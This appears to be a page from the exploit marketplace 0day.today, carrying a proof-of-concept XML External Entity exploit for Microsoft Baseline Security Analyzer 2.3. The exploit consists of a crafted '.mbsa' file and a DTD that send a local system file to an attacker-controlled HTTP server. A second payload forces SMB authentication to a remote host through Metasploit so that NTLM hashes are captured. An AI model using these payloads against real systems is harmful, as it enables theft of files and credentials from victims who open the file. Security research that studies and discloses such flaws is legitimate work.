0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection Vulnerability
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection # Author: John Page (aka hyp3rlinx) # Vendor: Microsoft # Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558 # Software Version: 2.3 # References: ZDI-CAN-6307 # References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt # References: hyp3rlinx.altervista.org # Security Issue # Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker # controlled server if a user opens a specially crafted ".mbsa" file. # Exploit/POC # Install MBSA # https://www.microsoft.com/en-us/download/details.aspx?id=7558 # 1) "evil.mbsa" <?xml version="1.0"?> <!DOCTYPE fileppe_fingerz [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> # 2) "payload.dtd" <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all; # When victim attempts open file they get prompted "Do you want to let this app # make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft. # After opening the local users files can be exfiltrated to a remote server. # Moreover, we can use this to steal NTLM hashes. # Using Forced Authentication to steal NTLM hashes # 2) msf > use auxiliary/server/capture/smb # msf auxiliary(smb) > exploit -j "evil.mbsa" <?xml version="1.0"?> <!DOCTYPE fileppe_fingerz [ <!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez"> %dtd;]> # Result: credentials captured by remote sever # 0day.today [2024-07-05] #